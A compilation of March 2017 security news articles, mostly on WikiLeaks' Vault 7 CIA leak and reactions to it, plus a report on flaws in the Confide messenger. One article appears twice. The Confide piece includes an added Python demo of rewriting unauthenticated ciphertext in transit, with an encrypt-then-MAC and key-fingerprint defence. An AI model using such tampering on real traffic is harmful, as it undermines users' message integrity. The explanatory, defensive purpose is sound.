The Wikileaks dump, called “Vault7,” exposed the hacking capabilities of the US Intelligence Agency and its internal infrastructure.

“Recently, the CIA lost control of the majority of its hacking arsenal including malware, viruses, trojans, weaponized “zero day” exploits, malware remote control systems and associated documentation,” reads the announcement issued by WikiLeaks.

According to Wikileaks, the precious archive appears to have been circulated among former US government experts and contractors in an unauthorized manner. One of them likely provided the files to WikiLeaks.

The archive includes confidential information, malicious codes, and exploits specifically designed to target popular products from various IT companies, including Samsung, Apple, Google, and Microsoft.

The hacking tools developed by the US cyber spies can target mobile devices, desktop computers, and IoT devices such as routers and smart TVs.

Now WikiLeaks has decided to share information on the hacking tools included in the Vault7 dump with the tech companies whose products are affected.

The White House promptly warned that there may be legal repercussions for the organization.

WikiLeaks says its intent is to protect the customers of the major companies whose products are affected by the hacking tools in the leak.

WikiLeaks (@wikileaks), 8 Mar 2017: “Tech companies are saying they need more details of CIA attack techniques to fix them faster. Should WikiLeaks work directly with them?” The poll offered three answers, “Yes, make people safe”, “No, they're the problem” and “Other (see my reply)”, and had drawn 52,388 votes at the time of writing.
WikiLeaks initially announced it would not release any tools or exploits “until a consensus emerges on the technical and political nature of the CIA’s program and how such ‘weapons’ should be analyzed, disarmed and published.”


During a WikiLeaks press conference on March 9, 2017, Julian Assange explained that the organization decided to share information with impacted companies.

“We have decided to work with them, to give them some exclusive access to the additional technical details we have so that fixes can be developed and pushed out so that people can be secured,” Assange said. “And then, once this material is effectively disarmed by us, by removing critical components, we will publish additional details about what has been occurring.”

The decision followed a poll WikiLeaks ran on Twitter, asking its followers whether it should share technical details of the hacking tools with the private companies that sell the products targeted by US intelligence.

Most respondents voted “Yes, make people safe,” while 36 percent said “No, they’re the problem.”

“If a program or a piece of information is classified, it remains classified regardless of whether or not it is released into the public venue or not,” said White House press secretary Sean Spicer. “I would just suggest that someone consult with [the Department of Justice] regarding the legal repercussions of any individual or entity using any piece of still-classified information or technique or product that hasn’t been declassified.”

The CIA has declined to comment on the authenticity of the WikiLeaks data leak, remarking that US law does not allow it to spy on US citizens.

As this is being written, tech companies are already working to fix the zero-day flaws in their products and to offer customers tools that detect anomalies in their applications.

Intel Security has released a tool that allows users to check if the firmware of computers contains unauthorized code.

The Advanced Threat Research team at Intel Security developed a new module for its existing CHIPSEC open-source framework to detect rogue EFI binaries. It can be run on Windows, Linux, macOS, and even from a UEFI shell.


Industry Reactions to CIA Hacking Tools: Feedback Friday

11.3.2017 securityweek BigBrothers
WikiLeaks this week released information on what it claims to be a trove of CIA hacking tools. The documents made public appear to show that the intelligence agency has had the tools and capabilities to hack a wide range of systems, including mobile devices, routers, TVs and even cars.

An initial analysis conducted by tech companies, including security firms, showed that a majority of the disclosed vulnerabilities have already been patched by vendors.


WikiLeaks initially refused to release any of the actual tools and exploits, but it has now promised to share more information with tech firms in an effort to help them protect their customers. However, the White House warned that there could be legal repercussions considering that the information is classified.

The CIA has not made any comments on the authenticity of the leak, which has been dubbed “Vault 7,” but the agency pointed out that it’s legally prohibited from spying on individuals in the United States.

Contacted by SecurityWeek, industry professionals shared some thoughts on the Vault 7 leak and its implications.

And the feedback begins…

Ilia Kolochenko, CEO, High-Tech Bridge:

"I am bit surprised that this particular incident has attracted so much attention. The CIA, like any other governmental intelligence agency, uses and will continue using various hacking tools and techniques to obtain any information they need to protect the country. This is their duty. So far, we don't have any evidence that these capacities were used unlawfully, for example to violate reasonable expectation of privacy of innocent US citizens or for illicit interference with elections.

It's also at least incorrect to speak about the CIA's inability to defend itself, as the source of the leak remains unknown. This can be an insider incident, against which - no large companies or governmental agencies are protected in any country. It can also be a honeypot - to distract someone's attention from the real arsenal of the US cyber warfare. I am pretty confident that US intelligence have much bigger technical resources than the garbage exposed in the leak.

Also, intelligence agencies cooperate in many areas, including cybersecurity and cyber warfare. Therefore, the CIA's collaboration and knowledge sharing with other agencies, such as the MI5, is obvious and is a common practice."
Tom Kellermann, CEO, Strategic Cyber Ventures (SCV):

“These exploits and attack platforms allow for an actor to become telepathic. It is quite obvious that this was an act of tradecraft by a foreign power to discredit the US government and to endow dangerous attacks capabilities to the cybercriminal community. The blatant pillaging of the US cyber armory will result in a dramatic escalation of the cyber-insurgency which is raging in US cyberspace. These cyber weapons will be used by the Russian cyber militias against NATO and Western targets. Wikileaks has expanded her arms bazaar and is now distributing digital grenade launchers and uzis to the malcontents and anti-American non-state actors of the world. Cyberspace is about to become a free fire zone.”
Rick Hanson, EVP, Skyport Systems:

“This is just another clear example where an organization that conducts breaches and leaks cannot be praised under ANY circumstance. Donald Trump previously praised Wikileaks during his campaign. When an organization like WikiLeaks is lauded in any forum there is reason to be concerned. The fact that Wikileaks claims to have critical CIA information should put our intel community on record.

The protection of sensitive tools and data by our intel community should be a top priority. If this leak turns out to be a reality, our governmental cybersecurity policy and implementation needs to be called into question. A key reason our intel community needs to operate only on "Zero Trust" systems with a hardware root of trust."
Ayal Yogev, VP of Product Management, SafeBreach:

“Any type of device you add to the network can be used by an attacker. This isn't new, but the information shared by Wikileaks about SmartTVs reinforces this. Additionally, while most may consider this a consumer-focused issue, in fact, SmartTVs are used by many enterprises in conference rooms and common areas. Imagine the types of executive level conversations an attacker might be privy to.

These new IoT devices are prime targets for an attacker since in many cases they are less protected than existing devices on the network and an attacker always looks for the weakest link. This is why knowing exactly what can be done from any point in your environment by a hacker is crucial. Understanding the kill chain can help enterprises prevent attacks, for example - a SmartTV may be hacked, but because there is no way to exfiltrate information from the segment the TV is in, you're breaking the kill chain, and containing the problem.”
Alex Rice, CTO, HackerOne:

"Vulnerabilities are difficult to keep as a secret, and this news break shows they don’t remain secret for long. The longer these vulnerabilities remain unpatched, the more dangerous they become because they can fall into criminal hands. The CIA put consumers at risk by not reporting these bugs to their vendors. Similarly, Wikileaks is no better at keeping secrets than the CIA and should immediately disclose any known vulnerabilities to the appropriate vendors so they can be fixed.

If there is a known vulnerability and it is not making it into the hands of the vendor so it can be resolved, something is broken. Companies and consumers should encourage the active disclosure of vulnerabilities no matter their source, this includes security researchers, active security teams, and the U.S. government. At minimum, this means a thorough review of the U.S. Government's Vulnerabilities Equities Process, which appears to have not been honored. This ultimately strains tech companies' relationship with the US government. The economy relies significantly on the trust of its consumers and if consumers can’t trust U.S. made tech products, this harms competitiveness in the market."
Mikko Hypponen, Chief Research Officer, F-Secure:

“It’s no surprise that the CIA is using these hacking techniques. What is unsuspected is the leak, and it’s huge. So the question is who leaked it to Wikileaks? The Russians, an insider? We don’t know the answer. Another question we need to ask us, why was it leaked now? We don’t know this either.

In countries like the US, the Intelligence Agency’s mission is to keep the citizens of their country safe. The Vault7 leak proves that the CIA had knowledge of iPhone vulnerabilities. However, instead of informing Apple, the CIA decided to keep it secret. So the leak tells us a bit about how the CIA decided to use its knowledge: it considered it more important to keep everybody unsecure than protecting its citizens from the vulnerability, and maybe use the vulnerability for its own purposes or counter terrorism purposes.”
Nathan Wenzler, chief security strategist, AsTech:

“Could this be the age of the EULA? There have been many reports and lawsuits in recent months (Vizio and Samsung come immediately to mind) of devices such as televisions recording information and potentially providing it to "third parties." Is it really any surprise to the security industry that these third parties might include government agencies such as the CIA? Where backdoors exist, there is often language present in the EULA that would suggest that the manufacturer may capture and share information.

We certainly want to believe that companies operate to the highest standards of protecting user's privacy, but there have simply been too many cases where intelligence agencies have publicly attempted to gain this sort of backdoor access through legal channels (FBI vs. Apple, anyone?) to think that no company is cooperating with these authorities. It may be time to make a serious review of licensing agreements and terms of service a standard part of our security programs, rather than the standard de facto process of blindly clicking "OK" at the bottom of the page. This doesn't necessarily make it right, moral or ethical, but, the writing has been on the wall the whole time, and these recent revelations should not come as a surprise, but rather serve as confirmation of what we have always believed was happening.”
Sanjay Kalra, Co-founder and Chief Product Officer, Lacework:

“There has been a lot of focus on the CIA leaks around exploits for Smart TVs, connected vehicles and lot of new gadgetry. If you look closely at the list of projects, the majority of them were focused on Unix. The Unix systems are considered to be extremely safe, however, the CIA had tools to do keyboard logging, copy network traffic and intercept secure connections to Unix machines. Unix runs and stores the crown jewels in data center/cloud for most of the enterprises today and exploiting them is a gold mine. Enterprises need to first focus on securing their core with breach detection and insider threat detection before looking to secure the next shiny object. Compromise to core can be disastrous.”
Chris Roberts, Chief Security Architect, Acalvio:

“One thing that is interesting is the mass of mis-directed social media indignation and ill-informed discussions about who’s been hacking where, what and when. The open library of “wild” code that is being attributed to various CIA branches is nothing more than data collected freely available on the Internet, therefore attributing hacks to the CIA because of the code fingerprints is woefully incorrect. That’s damaging both from a community not doing its research and the Intelligence community which is sitting there battered and bruised because of these losses AND now taking the heat for attacks it’s not likely done (Trump, DNC etc.)

The biggest issue is ‘we know’ most of what’s been disclosed, including hacks, code and covert operation styles. We also know what the tactics are. Heck, most of us use the very same tactical operations when engaged by clients or doing R&D. The code library is NICE to have in one place. But again, most of us have multiple snippets of various code bases.

What needs to happen now is that the intelligence community must stand up and simply say “yep, that’s us. We are at war in the electronic realm. Suck it up."
Willis McDonald, Senior Threat Manager, Core Security:

"The leaked CIA documents have potentially disastrous effects on ongoing CIA operations. If the tools detailed in the documents are still in use this now gives clues to targeted organizations as to what is of interest to the CIA. As a consequence this could also expose close contact human intelligence (HUMINT) operations leading to incarceration and possible harm to operatives.

The leak of these documents definitely has caused financial harm to the CIA. Response to the leak of the documents will require a massive research and retooling effort in the CIA. Everything from tradecraft to tools will need to be changed in order for operations to continue undetected which will cost millions of dollars and months of training and development."
Ajay Arora, CEO and Co-founder, Vera:

"If these docs prove to be authentic, everyone should once and for all throw out their blind trust that that their devices, apps or data is ever safe or private. People need to wake-up to the fact that they need to take responsibility for maintaining the privacy of their information and make no assumptions. At the end of the day, no one has your best interests in mind but you -- people can't even trust their own government any more. This is the tragic new normal we have to all unfortunately accept."
Apostolos Giannakidis, Lead Security Architect, Waratek:

"The Wikileaks release of the CIA's Vault 7 hacker tools is a dream come true for hackers and a nightmare for corporate security teams who are already under-resourced and over-stressed just trying to keep up with known threats, especially in application software.

This event highlights the risk of introducing new software code into an enterprise environment, especially from third-parties. Blindly putting unrestricted trust in software can greatly increase the risk of introducing new vulnerabilities and even hidden backdoors.

There are tools that can automate the process of identifying and increasing protection against these threats, but the attacks are likely to come faster than the defenders can implement them. It will take security teams weeks, months or even years to develop patches to address the exploits about to be unleashed into the mainstream over time.”
Gunter Ollmann, CSO, Vectra Networks:

“The CIA’s “UMBRAGE” program reveals the importance placed upon “false flag” signatures used in clandestine operations. It should be no surprise to the InfoSec community that such resources are expended to capture and duplicate the techniques used by foreign agencies and criminal organizations. It does however reinforce that the use of such techniques are, in fact, an everyday part of clandestine operational procedure – casting further doubt on public attribution disclosures – especially those quickly released and promoted by the marketing teams of commercial security vendors.”
Brian Vecci, Technical Evangelist, Varonis:

“It’s too easy for data to be stolen, even—allegedly—within the CIA’s Center for Cyber Intelligence. The entire concept of a spook is to be covert and undetectable; apparently that also applies to actions on their own network. According to WikiLeaks, this treasure trove of files was given to them by a former U.S. government contractor. The CIA is not immune to issues affecting many organizations: too much access with too little oversight and detective controls.

In performing forensics on the actual breach, the important examination is to determine how 8,761 files just walked out of one of the most secretive and confidential organizations in the world. Files that were once useful in their operations are suddenly lethal to those same operations. We call this toxic data, anything that is useful and valuable to an organization but once stolen and made public turns toxic to its bottom line and reputation. All you have to do is look at Sony, Mossack Fonseca and the DNC to see the effects of this toxic data conversion.”
Philip Lieberman, President, Lieberman Software:

“Presidential Directive 20 and Title 10 provide transparency to the strategy and resources of the US Government regarding methods and technologies used for national security purposes. The creation, capabilities and usage of cyber weapons is controlled by the Senate, Congress and President in a coordinated process governed by law. The agencies themselves do not operate independently or autonomously without first receiving detailed authorization and direction from national leadership and is vetted by the judicial branch.

Questions as to the capabilities and usage of those capabilities should be directed to the Senate and President directly rather than the agencies themselves as they simply carry out operations directed from above them.

The appropriateness and usage of capabilities is a matter of politics and national security that may or may not disturb citizens. My advice is to contact your representative in Congress and the Senate and ask them for an explanation as to why and how these capabilities are used.”


CIA replies to WikiLeaks Vault7 Leak, it is operating to protect Americans
10.3.2017 securityaffairs  BigBrothers

WikiLeaks Vault7 – CIA pointed out that its mission is to “aggressively collect” foreign intelligence from overseas entities.
The U.S. Central Intelligence Agency (CIA) has issued an official statement in response to the Wikileaks Vault7 Data leak.

The US intelligence agency denies conducting large-scale surveillance of US citizens.

According to unnamed U.S. officials quoted by Reuters, the most likely source of the data leak is a CIA contractor.

“Contractors likely breached security and handed over documents describing the Central Intelligence Agency’s use of hacking tools to anti-secrecy group WikiLeaks, U.S. intelligence and law enforcement officials told Reuters on Wednesday,” Reuters reported.

“Two officials speaking on condition of anonymity said intelligence agencies have been aware since the end of last year of the breach, which led to WikiLeaks releasing thousands of pages of information on its website on Tuesday.”

If confirmed, this is a disconcerting detail, because it is not clear whether the Agency, aware of the breach since late 2016, notified the IT vendors whose products are targeted by its hacking tools.

The CIA and the FBI have launched an investigation into the WikiLeaks Vault7 data leak, even though the Central Intelligence Agency has not confirmed the authenticity of the huge trove of files.

The intelligence Agency pointed out that its mission is to “aggressively collect” foreign intelligence from overseas entities. Its mission is to protect the US from foreign governments and non-state actors such as terrorists.

“It is CIA’s job to be innovative, cutting-edge, and the first line of defense in protecting this country from enemies abroad,” reads the statement issued by the CIA.

“The American public should be deeply troubled by any Wikileaks disclosure designed to damage the Intelligence Community’s ability to protect America against terrorists and other adversaries. Such disclosures not only jeopardize U.S. personnel and operations, but also equip our adversaries with tools and information to do us harm,” the agency said.

The tools in the CIA arsenal appear to have been designed for targeted attacks rather than dragnet surveillance. The CIA pointed out that it is legally prohibited from spying on individuals in the United States, and said that all of its activities “are subject to rigorous oversight to ensure that they comply fully with U.S. law and the Constitution.”

The US Government is worried about the impact of the Vault 7 data leak on the activities of US intelligence agencies. The revelations put the effectiveness of their tools and techniques at serious risk.

What are the reactions of other governments to the WikiLeaks dump?

China expressed concern at the revelations, since the products of several Chinese companies may have been targeted by CIA hackers.

“China expressed concern on Thursday over revelations in a trove of data released by Wikileaks purporting to show that the CIA can hack all manner of devices, including those made by Chinese companies.” reported the Reuters..

“Dozens of firms rushed to contain the damage from possible security weak points following the anti-secrecy organization’s revelations, although some said they needed more details of what the U.S. intelligence agency was up to.

Widely-used routers from Silicon Valley-based Cisco (CSCO.O) were listed as targets, as were those supplied by Chinese vendors Huawei [HWT.UL] and ZTE (000063.SZ) and Taiwan supplier Zyxel for their devices used in China and Pakistan.”

The Germany’s foreign ministry issued a statement saying that it is in contact with the U.S. Government to receive more information on the case.

The chief federal prosecutor’s office confirmed it would review the Wikileaks data dump related to the claims that the CIA ran a hacking hub from the U.S. consulate in Frankfurt.

“We will initiate an investigation if we see evidence of concrete criminal acts or specific perpetrators,” a spokesman for the federal prosecutor’s office told Reuters.


CIA replies to WikiLeaks Vault7 Leak, it is operating to protect Americans
10.3.2017 securityaffairs BigBrothers

WikiLeaks Vault7 – CIA pointed out that its mission is to “aggressively collect” foreign intelligence from overseas entities.
The U.S. Central Intelligence Agency (CIA) has issued an official statement in response to the Wikileaks Vault7 Data leak.

The US intelligence agency denies conducting a large-scale surveillance on its citizens.

According to unnamed U.S. officials quoted by the Reuters press agency, the most likely source of the data leak is a CIA contractor.

“Contractors likely breached security and handed over documents describing the Central Intelligence Agency’s use of hacking tools to anti-secrecy group WikiLeaks, U.S. intelligence and law enforcement officials told Reuters on Wednesday,” Reuters reported.

“Two officials speaking on condition of anonymity said intelligence agencies have been aware since the end of last year of the breach, which led to WikiLeaks releasing thousands of pages of information on its website on Tuesday.”

If confirmed, this is a very disconcerting detail, because it is not clear whether the intelligence agency has reported the incident to the IT vendors whose products could be targeted by the CIA hacking tools.

The CIA and the FBI have launched an investigation into the Wikileaks Vault7 data leak, even if the Central Intelligence Agency did not confirm the authenticity of the huge trove of files.

The intelligence Agency pointed out that its mission is to “aggressively collect” foreign intelligence from overseas entities. Its mission is to protect the US from foreign governments and non-state actors such as terrorists.

“It is CIA’s job to be innovative, cutting-edge, and the first line of defense in protecting this country from enemies abroad,” reads the statement issued by the CIA.

“The American public should be deeply troubled by any Wikileaks disclosure designed to damage the Intelligence Community’s ability to protect America against terrorists and other adversaries. Such disclosures not only jeopardize U.S. personnel and operations, but also equip our adversaries with tools and information to do us harm,” the agency said.

The tools in the CIA arsenal appear to have been designed for targeted attacks rather than dragnet surveillance. The CIA pointed out that intelligence agencies and law enforcement bodies are not allowed to spy on individuals in the United States. The agency said its activities “are subject to rigorous oversight to ensure that they comply fully with U.S. law and the Constitution.”

According to the CIA, all the operations conducted by the US agencies “are subject to rigorous oversight to ensure that they comply fully with U.S. law and the Constitution.”

The US Government is worried about the impact of the Vault 7 data leak on the activities conducted by US intelligence agencies. The revelations put at serious risk the efficiency of its tools and techniques.

What are the reactions of other governments to the Wikileaks dump?

China expressed concern at the revelations, since the products of many Chinese companies may have been targeted by the CIA hackers.

“China expressed concern on Thursday over revelations in a trove of data released by Wikileaks purporting to show that the CIA can hack all manner of devices, including those made by Chinese companies,” Reuters reported.

“Dozens of firms rushed to contain the damage from possible security weak points following the anti-secrecy organization’s revelations, although some said they needed more details of what the U.S. intelligence agency was up to.

Widely-used routers from Silicon Valley-based Cisco (CSCO.O) were listed as targets, as were those supplied by Chinese vendors Huawei [HWT.UL] and ZTE (000063.SZ) and Taiwan supplier Zyxel for their devices used in China and Pakistan.”

Germany’s foreign ministry issued a statement saying that it is in contact with the U.S. Government to receive more information on the case.

The chief federal prosecutor’s office confirmed it would review the Wikileaks data dump related to the claims that the CIA ran a hacking hub from the U.S. consulate in Frankfurt.

“We will initiate an investigation if we see evidence of concrete criminal acts or specific perpetrators,” a spokesman for the federal prosecutor’s office told Reuters.


Multiple Security Gaps Found in Confide Messaging App

10.3.2017 securityweek Vulnerebility
Multiple vulnerabilities recently found in the Confide messaging application could allow an attacker to leak session information, enumerate users, and even access details such as emails and phone numbers.

Confide is promoted as a “confidential messenger” that allows users to speak freely, without fearing eavesdropping, courtesy of “military grade end-to-end encryption.” However, security researchers with IOActive and Quarkslab have discovered that users’ conversations were actually exposed to man-in-the-middle (MiTM) attacks, and also uncovered various other vulnerabilities in the messenger.

In a recent report (PDF), IOActive notes that the application’s notification system did not require a valid SSL server certificate to communicate, thus leaking session information to MiTM attacks. Furthermore, the app allowed for unencrypted messages to be delivered, without alerting the user on the matter.

During their analysis, IOActive researchers also found that the software was uploading file attachments before the user sent the intended message, and that it allowed attackers to send malformed messages that could crash, slow, or otherwise disrupt the application.

Furthermore, the application didn’t use authenticated encryption, meaning that Confide was able to alter messages in-transit, an issue discovered by Quarkslab’s Jean-Baptiste Bédrune, who published a comprehensive technical analysis detailing how Confide could perform man-in-the-middle attacks and read users’ messages.

According to Bédrune, the application didn’t use a cryptographic integrity mechanism and the cryptographic protocol did not involve authentication. When notified of a new message, the client would request a list of unread threads from the server, but had no means to verify the origin of the message and to check the sender's public key authenticity either.

“The most obvious problem is […] linked to the fact that the encrypted message origin and the authenticity of the public encryption key transmitted by the server can in no way be verified by the client,” the researcher notes. The Confide server could generate its own key pair and transmit the public part to a client, decrypt the messages sent by the client, and re-encrypt them with its own key for the actual recipient, Bédrune claims.

Other major issues discovered (PDF) by IOActive were related to account management, as it provided an attacker with the possibility to enumerate all Confide user accounts. Furthermore, the app didn’t employ a mechanism to adequately prevent brute-force attacks on user account passwords and even short, easy-to-guess passwords were allowed.

The application's website was also found to be vulnerable. Specifically, researchers discovered an arbitrary URL redirection in it and say that this could facilitate social engineering attacks against users. Additionally, the website was observed reflecting incorrectly entered passwords back to the browser.

By exploiting the vulnerabilities, an attacker could impersonate another user by hijacking their account session or by guessing their password, learn the contact details of all or specific Confide users, become an intermediary in a conversation and decrypt messages, or alter the contents of a message or attachment in transit without first decrypting it, IOActive says.

An attacker could also leak a great deal of user information, such as: usernames; whether the user has clicked the provided verification link; userIDs; the users’ public keys; the users’ phone numbers; and the users’ email addresses.

The security company tested Confide messaging app versions 4.0.4 for Android and 1.4.2 for Windows and Mac OS X and says it was able to recover more than 7,000 records for users registered between February 22-24, 2017. IOActive estimates that “between 800,000 and one million user records were potentially contained in the database.”

“Building a secure instant messaging is not easy, but when claiming it, some strong mechanisms should really be enforced since the beginning. The confidentiality of the exchanged messages depends on the robustness of TLS. Confide can technically read all the messages that pass through its servers. End-to-end encryption, as it is implemented, solely relies on the server through which the messages pass,” Bédrune notes.

Confide was alerted on the discovered issues and has already updated its mobile and desktop applications to address some of them. The company also confirmed that it could theoretically perform MiTM attacks against its users, but also says that it plans on releasing another update to add support for independent fingerprint verification.
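The two protocol weaknesses described in this article (no integrity mechanism, so an intermediary can alter a message in transit without decrypting it, and no way for the client to verify the sender's public key independently of the server) are easy to reproduce in a few lines. The script below is an added example written for this page; it is not Confide's code, nor IOActive's or Quarkslab's test code. It uses a toy stream cipher built from HMAC-SHA256 in counter mode (constructed here so the example runs on the Python standard library alone; it stands in for any unauthenticated stream or CTR mode, not for Confide's actual algorithm), constructed keys and a constructed sample message. It shows the blind in-transit rewrite succeeding against the unauthenticated variant, the same rewrite being rejected by an encrypt-then-MAC variant, and the out-of-band fingerprint comparison that a server-substituted key pair fails.

```python
import hashlib
import hmac
import secrets

TAG_LEN = 32  # bytes of HMAC-SHA256 appended by the authenticated variant


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Toy stream cipher keystream: HMAC-SHA256 in counter mode (constructed
    for this example; stands in for any unauthenticated stream/CTR mode)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt_unauthenticated(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    """Confidentiality only: ciphertext = plaintext XOR keystream. Decryption is
    the same operation, and nothing lets the receiver detect modification."""
    return xor_bytes(plaintext, keystream(key, nonce, len(plaintext)))


def alter_in_transit(ciphertext: bytes, offset: int, known: bytes, wanted: bytes) -> bytes:
    """What an intermediary can do to unauthenticated ciphertext: if it knows (or
    guesses) that bytes `known` sit at `offset`, XORing in (known ^ wanted) makes
    the receiver decrypt `wanted` there. No key and no decryption is needed."""
    if len(known) != len(wanted):
        raise ValueError("replacement must keep the same length")
    delta = xor_bytes(known, wanted)
    patched = xor_bytes(ciphertext[offset:offset + len(delta)], delta)
    return ciphertext[:offset] + patched + ciphertext[offset + len(delta):]


def encrypt_authenticated(enc_key: bytes, mac_key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC: the tag covers nonce and ciphertext, so any change to
    either is detected before decryption (the property an AEAD mode provides)."""
    ct = encrypt_unauthenticated(enc_key, nonce, plaintext)
    tag = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    return ct + tag


def decrypt_authenticated(enc_key: bytes, mac_key: bytes, nonce: bytes, blob: bytes) -> bytes:
    ct, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        raise ValueError("integrity check failed: message was altered in transit")
    return encrypt_unauthenticated(enc_key, nonce, ct)


def key_fingerprint(public_key: bytes) -> str:
    """Short, human-comparable digest of a peer's public key."""
    return hashlib.sha256(public_key).hexdigest()[:16]


def peer_key_is_trusted(received_key: bytes, out_of_band_fingerprint: str) -> bool:
    """The check the article says Confide lacked: compare the key the server
    handed us with a fingerprint obtained independently of that server (in
    person, QR code, ...). A server that substitutes its own key pair fails it."""
    return hmac.compare_digest(key_fingerprint(received_key), out_of_band_fingerprint)


def demo() -> tuple:
    """Runs the unauthenticated and authenticated paths on a constructed message
    and returns (what the receiver got without a MAC, verdict with a MAC)."""
    enc_key, mac_key = secrets.token_bytes(32), secrets.token_bytes(32)
    nonce = secrets.token_bytes(16)
    message = b"transfer 100 USD to alice"  # constructed sample plaintext

    # 1. No integrity: the intermediary rewrites "100" to "900" blindly.
    ct = encrypt_unauthenticated(enc_key, nonce, message)
    tampered = alter_in_transit(ct, 9, b"100", b"900")
    received_without_mac = encrypt_unauthenticated(enc_key, nonce, tampered)

    # 2. Encrypt-then-MAC: the same rewrite is rejected before decryption.
    blob = encrypt_authenticated(enc_key, mac_key, nonce, message)
    tampered_blob = alter_in_transit(blob[:-TAG_LEN], 9, b"100", b"900") + blob[-TAG_LEN:]
    try:
        decrypt_authenticated(enc_key, mac_key, nonce, tampered_blob)
        verdict = "accepted"
    except ValueError:
        verdict = "rejected"
    return received_without_mac, verdict


if __name__ == "__main__":
    got, verdict = demo()
    print("without integrity protection the receiver reads:", got)
    print("with encrypt-then-MAC the altered message is:", verdict)
```

The point of the fingerprint helper is that the comparison value must come from somewhere the server cannot influence; a fingerprint fetched from the same server that delivers the key proves nothing, which is why the article notes that Confide planned to add independent fingerprint verification.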


WikiLeaks to Share CIA Hacking Tools With Tech Firms

10.3.2017 securityweek BigBrothers
WikiLeaks has decided to share information on the alleged CIA hacking tools with the tech companies whose products are affected, but the White House has warned that there may be legal repercussions.

The Vault 7 files made public this week by WikiLeaks appear to show that the intelligence agency has had the tools and capabilities to hack a wide range of systems, including mobile and desktop devices, networking equipment, and Internet of Things (IoT) devices.

The products of several major companies are mentioned in the leaks and many of them have asked the whistleblower organization to share additional information to help them ensure that their customers are protected against possible cyberattacks.

While it has published numerous documents containing technical information, WikiLeaks initially said it would not release any actual tools or exploits “until a consensus emerges on the technical and political nature of the CIA's program and how such 'weapons' should be analyzed, disarmed and published.”

However, WikiLeaks founder Julian Assange said in a press conference on Thursday that the decision to not release the exploits limits the ability of vendors to issue security fixes. That is why WikiLeaks has decided to share information with impacted companies.

“We have decided to work with them, to give them some exclusive access to the additional technical details we have so that fixes can be developed and pushed out so that people can be secured,” Assange said. “And then, once this material is effectively disarmed by us, by removing critical components, we will publish additional details about what has been occurring.”

It’s worth noting that WikiLeaks has launched a poll on Twitter, asking users if more details should be shared with tech companies, and 57 percent of respondents said “Yes, make people safe,” while 36 percent of respondents said “No, they’re the problem.”

While the decision to share technical details with technology companies may be good news, White House representatives have warned about the possible legal repercussions for these firms.

“If a program or a piece of information is classified, it remains classified regardless of whether or not it is released into the public venue or not,” said White House press secretary Sean Spicer. “I would just suggest that someone consult with [the Department of Justice] regarding the legal repercussions of any individual or entity using any piece of still-classified information or technique or product that hasn’t been declassified.”

Based on the information made public by WikiLeaks, security firms and major tech companies such as Microsoft, Apple and Google have determined that many of the vulnerabilities leveraged by the alleged CIA tools don’t affect the latest versions of their products. In fact, some of the flaws were patched several years ago.

The CIA has refused to comment on the authenticity of the leaked documents, but pointed out that the agency is legally prohibited from spying on individuals in the United States.


Apple, Google Say Users Protected Against CIA Exploits

9.3.2017 securityweek BigBrothers
Apple and Google are confident that a majority of the vulnerabilities disclosed by WikiLeaks as part of the “Vault 7” release, which focuses on the hacking tools allegedly used by the U.S. Central Intelligence Agency (CIA), do not affect the latest versions of their products.

Microsoft is investigating the leaked documents, but it has yet to provide any specific information. Apple, on the other hand, said its initial analysis indicated that many of the issues mentioned in the Vault 7 leaks are patched in the latest version of its iOS operating system, and pointed out that nearly 80 percent of its customers are running the latest release.

Nevertheless, the company has promised to continue working on quickly addressing any identified flaws.

Google’s analysis is also ongoing, but the tech giant says it’s confident that the security updates and protections in Chrome and the Android operating system can shield users against many of the exploits.

The files released by WikiLeaks indicate that the CIA has had the tools and capabilities needed to hack any type of system, including mobile devices, desktop computers, networking equipment, and Internet of Things (IoT) devices.

Vulnerabilities affecting operating systems such as Android and iOS could have a critical impact as they can allow attackers to gain complete control of a device and access sensitive user information. Hackers can even obtain messages exchanged via secure applications such as Signal and Telegram without having to break their encryption.

Security firms have scrambled to assess the impact of the CIA hacking tools, but so far there is no evidence that the intelligence agency’s exploits are very sophisticated. A majority of the disclosed vulnerabilities have either been patched a long time ago, or they are considered low severity.

However, WikiLeaks has not released any of the actual exploits, making it difficult for vendors to assess the real impact. The whistleblower organization has considered providing more details to tech companies in order to allow them to fix the vulnerabilities faster.

The CIA has not commented on the authenticity of the leaked documents, but it pointed out that its mission is to collect foreign intelligence overseas in an effort to protect the U.S. from adversaries such as terrorists and hostile nation states. The CIA also noted that it is legally prohibited from spying on individuals in the United States. The agency accused WikiLeaks of jeopardizing U.S. personnel and operations.


CIA Responds to WikiLeaks Hacking Tool Dump

9.3.2017 securityweek BigBrothers

CIA: We Are Innovative but We Don’t Spy on Fellow Americans

The U.S. Central Intelligence Agency (CIA) has issued a statement in response to the claims made by WikiLeaks in regards to the agency’s hacking tools, and denied conducting electronic surveillance on Americans.

The CIA and the FBI have launched an investigation into the Vault 7 dump and unnamed U.S. officials told Reuters that the most likely source of the breach is a CIA contractor.

In its initial press release, WikiLeaks said the files, originating from the CIA’s Center for Cyber Intelligence (CCI) in Langley, Virginia, had been circulating among former government hackers and contractors. One of them allegedly provided the data to the whistleblower organization.

The CIA has refused to comment on the authenticity of the leaked documents or the status of its investigation into this incident. However, the agency pointed out that its mission is to “aggressively collect” foreign intelligence from overseas entities in an effort to protect America from adversaries such as terrorists and hostile nation states.

“It is CIA’s job to be innovative, cutting-edge, and the first line of defense in protecting this country from enemies abroad,” the CIA said in its statement.

The nature of the tools suggests that they are designed for targeted operations – rather than mass surveillance – and the CIA pointed out that it’s legally prohibited from spying on individuals in the United States. The agency said its activities “are subject to rigorous oversight to ensure that they comply fully with U.S. law and the Constitution.”

The organization has expressed concern about the impact of the Vault 7 dump on its operations.

“The American public should be deeply troubled by any Wikileaks disclosure designed to damage the Intelligence Community’s ability to protect America against terrorists and other adversaries. Such disclosures not only jeopardize U.S. personnel and operations, but also equip our adversaries with tools and information to do us harm,” the agency said.

